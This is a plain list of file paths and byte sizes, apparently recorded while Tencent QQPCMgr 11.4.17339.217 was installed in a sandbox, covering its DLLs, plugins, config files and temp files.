%Program Files%\Tencent\QQPCMgr\11.4.17339.217\RefuseInject.dll (3298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\PackageConf.dll (2173 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_2000.dat (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\OptimizeExDll.dll (5435 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMArpMgr.png (843 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.tpc (763 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCStub.exe (298 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftConfig.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPYellowTipsMgr.dll (1747 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.rdb (81 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1221.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpcupgradejump.png (503 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_129.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.rdb (1624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSWebMon.dat (4318 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMBluescreenFixer\bugreport.exe (8121 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1021.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRtpDLL.dll (1244 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1002.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NMLib.dat (101 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_579.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1610.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.rdb (86 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAccountProtection.exe (13306 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\RocketConfig.etf (406 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQRepair.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftBaseInfoForFileOpen.etf (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\libjpegturbo.dll (2946 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_116.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMonPlugin.dll (849 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\MFConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\bugreport.exe (7337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCHwVedioDetect.dll (1945 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.rdb (1626 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSpecTips\QMSpecTips.tpc (685 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1411.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\QQPCDetector\dlcore.dll (18592 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1302.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\xpNotify.html (549 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\libpng.dll (1699 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHPScanAv.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFileMonCyber.dat (718 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\LoadError.html (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMStartupMonitorNotify\whitelist.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DLProtectComm.dll (1211 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDeskTopGC.rdb (2760 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\Common.dll (17245 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMPToolTrayPlugin\QMPToolTrayPlugin.dll (949 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMRouterPlugin.png (722 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_706.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssocScanLib2.dat (54 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.rdb (126 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPSysScan\HPSysScanner.dll (2942 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1415.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLPConfig.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GlobalConfig.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\jgIOStub.dll (1938 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1096.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPConfig.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1093.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMIEMalRtpPlugin\QMIEMalRtpPlugin.dll (252 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMDnsMonitor\QMDnsMonitor.dll (2840 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDeskTopGC.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qqpcmgr.dat (712 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\ProcessNameList.xml (30 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SoftMove.png (622 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMVulPlugin\QMVulPlugin.tpc (671 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1225.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Uninst.exe (10899 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1223.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysOptimize\QMTraceClear.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVE.dll (2662 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\PhotoCraftPlugin.png (615 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\HPScanUIPlugin\HPScanUIPlugin.tpc (711 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpkcom.dll (1748 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\MyPhone_Notify.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.dll (3201 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TVL00003.tvl (8 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\libpng.dll (936 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupGiftBagMgr\GameSpeedupGiftBagMgr.rdb (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\extract.dll (3275 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMScriptHost.dll (3562 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1109.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\npQMExtensionsMozilla.dll (1960 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\exnscan64.dll (5143 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask71.png (660 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.tpc (710 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\AutoTaskConfig.bat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_558.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMAdBlock.png (653 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\YLZTConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1083.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGuide.exe (2050 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virdex02.def (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIESafeDll.dll (4562 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1605.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgrWList.etf (633 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\GarbageSoftInfo.xml (18 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1404.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftConfig.rdb (75 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCMgr.exe (161 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1408.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1003.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTencentNews.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTencentNews.exe (4882 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_668.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\HomePageRecommendItemsRes.zip (8 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\StartupMgr.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMobileFlux\QMNetMobileFluxDll.dll (1319 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMForbiddenWinKey.dll (463 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\TPSConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinic.exe (9570 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1103.dat (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\setup.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\arkGraphic.dll (2208 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCTray.rdb (122 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1032.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRealTimeSpeedup.dat (728 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibwhite.xml (26 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.dll (2920 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\libexpatw.dll (1566 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRtpCheck.dll (3419 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ScUrConfig.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysmalwarejmp\SysMalwareJmp.dll (1061 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameSpeedup.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPTool.exe (144 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2061.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMCommon.dll (6388 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\dr.dll (4735 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\Bin\SSOCommon.dll (11809 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GF.dll (18769 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QQPCMgrUpdate.exe (6662 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\libjpegturbo.dll (3622 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\TencentNews.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMCheckNetwork.exe (1346 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCTray.exe (4426 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1094.dat (443 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sBoth_Disconnected.png (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\libexpatw.dll (1196 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPluginMgr.dll (10191 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMLoader\QQPCDetector.dll (7829 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.tpc (591 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.dll (11150 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\HPScanUIPlugin\HPScanUIPlugin.dll (6942 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmspeedupplugin\speeduprocket\SpeedupRocket.rdb (7972 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TVL00000.tvl (11 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10523.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRecommender.dll (3882 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1226.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSWebMon64.dat (1697 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFWX64.DAT (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupExposure\GameExposureCfg.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextUninstall.dll (581 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.tpc (676 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\exe_gray.ico (82 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1101.dat (446 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\support.etf (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_11.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FtSysIconGF.rdb (134 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_891.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield256.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMHIPSEngine.dll (48 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFTSysShortTask.exe (2248 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GarbageCleanerScript.dat (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\SMFilter.etf (769 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSignScan.exe (3428 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\MalWare.tpc (702 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinicNet.png (883 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\RICHED20.DLL (9767 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDrvPerfMon.dll (1556 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virpe01.def (1723 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVUpload.dll (5765 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\wifigx.png (800 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_565.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FilterService.ini (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSClinicWebFix.dll (2435 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QMNetMonDll.dll (768 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SMobileAssisCfg.etf (323 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\libjpegturbo.dll (4319 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMProviderUpdate.EXE (967 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\jgImage.dll (851 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage(big).png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\Common.dll (17427 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterMgr.rdb (249 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\tinyxml.dll (1452 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\SysHomePage.rdb (6435 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\GF.dll (19385 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1015.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMMalCoreCfgV1.dat (3714 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\IEStartPageConfig.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1105.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\libexpatw.dll (691 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_112.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy (808 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10007.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPersonalCenter.exe (4662 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibpw.xml (305 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.rdb (163 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHipsNotifyReport.dat (744 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysgarbagejmp\SysGarbageJmp.dll (1056 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCClinicNet\QQPCClinicNet.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_120.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCB2AndroidJmp.png (276 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQRepair.exe (3502 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.rdb (222 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10485.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\msvcp80.dll (7937 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\QQPCCommonMgr.rdb (15196 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulPage.dll (6558 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_479.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCLeakScan.exe (8300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\pluginctrl.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1405.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.64.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.rdb (136 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameLogo\defaultlogo.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysgarbagejmp\SysCleanPage.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.tpc (705 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinicHelper64.exe (1550 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmpredownload\QMPreDownload.dll (1883 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_794.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_13.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1228.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_862.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPVulScan\HPVulScan.dll (184 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\OperationFileCloudMgr.dll (2875 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdFilter.exe (5041 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetRepair.rdb (178 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\PluginPackage\InstallCfg.xml (156 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1070.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10492.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloadStrategy.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1227.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\SpeedupMsg.dll (3088 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_559.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\jgImage.dll (45 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\traceclear.tpc (687 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsmcp.DAT (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMTrojanScan.dll (10367 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCLaunch.exe (25 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\StartupMgr.rdb (7320 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVCleanDr.dll (2054 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_949.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMClinicsettingcenter\QMClinicSettingCenter.dll (1415 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QMDataUpdate.dll (1527 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\tinyxml.dll (1153 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\FileSmash.png (314 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCLeakScan.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\MemDefragWhiteList.etf (211 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.dll (7604 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HW_GameScore.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGCShellExt64.dll (5823 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdBlock.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMNewsTips\QMNewsTips.dll (6208 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_141.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperKillModules.dll (2457 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMPerfCtrl\QMPerf.dll (2130 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1818.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMNetworkMgr.dll (1646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\8.0.50727.4053.Policy (804 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr03.def (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\AdFilterConfigFile.xml (5 bytes)
